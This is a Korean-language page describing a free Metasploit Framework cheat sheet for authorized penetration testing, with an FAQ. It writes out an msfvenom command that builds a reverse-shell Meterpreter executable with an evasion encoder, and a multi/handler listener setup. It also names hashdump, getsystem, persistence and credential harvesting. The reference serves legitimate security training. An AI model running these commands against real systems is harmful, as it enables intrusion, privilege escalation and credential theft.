liminfo

Metasploit Reference

Metasploit 프레임워크 레퍼런스

36개 결과

Metasploit Reference 소개

Metasploit 레퍼런스는 Metasploit Framework 침투 테스트 플랫폼의 명령어를 모듈, Exploit, Payload, Meterpreter, 보조모듈, 포스트의 6개 카테고리로 정리한 검색 가능한 치트시트입니다. 각 항목에는 명령어 구문, 설명, 실제 보안 테스트에서 사용하는 예제가 포함됩니다.

msfconsole 시작, 모듈 검색(타입, 플랫폼, CVE, 이름별), use로 모듈 선택, set/setg 옵션 설정, show options, info, back 명령어 등 핵심 Metasploit 조작법을 다룹니다. Exploit 실행에는 run/exploit, 백그라운드 작업(-j), 취약점 확인(check), 세션 관리, multi/handler 리스너 설정이 포함됩니다.

msfvenom 페이로드 생성(EXE, 인코딩, staged vs stageless), Meterpreter 포스트 익스플로잇 명령어(sysinfo, getuid, shell, upload/download, hashdump, getsystem, migrate), 보조 스캐너(TCP 포트 스캔, SMB 버전, HTTP 디렉토리 스캔, SOCKS 프록시), 포스트 모듈(사용자 열거, 로컬 권한 상승 제안, 지속성, 자격 증명 수집, autoroute 피벗) 등 고급 주제를 포함합니다.

주요 기능

  • 6개 카테고리에 걸친 34개 이상의 Metasploit Framework 명령어 레퍼런스
  • 모듈 관리: msfconsole, search(타입/플랫폼/CVE/이름), use, show options, set/setg, info
  • Exploit 실행: run/exploit, 백그라운드 작업(-j), 취약점 확인(check), 세션 관리, multi/handler
  • 페이로드: msfvenom 생성, 인코더(shikata_ga_nai), staged vs stageless 페이로드 유형
  • Meterpreter 명령어: sysinfo, getuid, shell, upload/download, hashdump, getsystem, migrate
  • 보조 스캐너: TCP 포트 스캔, SMB 버전 탐지, HTTP 디렉토리 스캔, SOCKS 프록시
  • 포스트 익스플로잇: 사용자 열거, 로컬 익스플로잇 제안, 지속성, 자격 증명 수집, autoroute
  • 침투 테스트 중 빠른 명령어 조회를 위한 즉시 검색과 카테고리 필터링

자주 묻는 질문

이 Metasploit 치트시트는 어떤 내용을 다루나요?

모듈(msfconsole, search, use, info, show options, set/setg, back), Exploit(run/exploit, 백그라운드 작업, check, sessions, multi/handler), Payload(show payloads, set PAYLOAD, msfvenom, 인코더, staged vs stageless), Meterpreter(sysinfo, getuid, shell, upload/download, hashdump, getsystem, migrate), 보조모듈(TCP 포트 스캔, SMB 버전, HTTP 디렉토리 스캔, SOCKS 프록시), 포스트(사용자 열거, 권한 상승 제안, 지속성, 자격 증명, autoroute)의 6개 카테고리를 다룹니다.

Metasploit에서 모듈을 검색하는 방법은?

search 명령어에 필터를 사용합니다: search type:exploit platform:windows smb는 Windows SMB 익스플로잇을 찾습니다. search cve:2021-34527로 CVE 검색, search name:eternalblue로 이름 검색이 가능합니다. 검색 결과의 모듈 경로를 use 명령어로 선택합니다.

staged와 stageless 페이로드의 차이는 무엇인가요?

Staged 페이로드(windows/meterpreter/reverse_tcp, / 구분)는 작은 stager를 먼저 전송한 뒤 전체 페이로드를 다운로드합니다. Stageless 페이로드(windows/meterpreter_reverse_tcp, _ 구분)는 전체 페이로드를 한 번에 전송합니다. Staged는 크기가 작지만 안정적 연결이 필요하고, Stageless는 크기가 크지만 더 안정적입니다.

msfvenom으로 페이로드를 생성하는 방법은?

msfvenom -p <페이로드> LHOST=IP LPORT=포트 -f 형식 -o 출력파일 형태로 사용합니다. 예: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe. -e x86/shikata_ga_nai -i 3으로 인코딩을 추가합니다. msfvenom -l payloads로 페이로드 목록, -l formats로 형식 목록을 확인합니다.

Meterpreter의 핵심 명령어는 무엇인가요?

sysinfo(시스템 정보), getuid(현재 사용자), shell(OS 쉘 획득), upload/download(파일 전송), hashdump(패스워드 해시 덤프), getsystem(SYSTEM 권한 상승), migrate PID(다른 프로세스 이동), ps(프로세스 목록), background(세션 유지하며 msfconsole 복귀) 등이 핵심 명령어입니다.

Metasploit 리스너를 설정하는 방법은?

exploit/multi/handler를 사용합니다: use exploit/multi/handler 후 set PAYLOAD windows/meterpreter/reverse_tcp, set LHOST 0.0.0.0, set LPORT 4444, exploit -j로 백그라운드 실행합니다. 생성된 페이로드의 들어오는 연결을 수신합니다.

스캐닝에 사용할 수 있는 보조 모듈은?

auxiliary/scanner/portscan/tcp는 서브넷 TCP 포트 스캔, auxiliary/scanner/smb/smb_version은 SMB 서비스 탐지, auxiliary/scanner/http/dir_scanner는 웹 디렉토리 열거, auxiliary/server/socks_proxy는 피벗을 위한 SOCKS 프록시 설정에 사용합니다.

이 레퍼런스는 무료인가요?

네, 완전 무료이며 회원가입이 필요 없습니다. 모든 콘텐츠가 브라우저에서 즉시 검색과 카테고리 필터링으로 사용 가능합니다. 이 레퍼런스는 인가된 침투 테스트와 보안 교육 목적으로만 사용해야 합니다. 데스크톱, 태블릿, 모바일에서 다크 모드와 함께 작동합니다.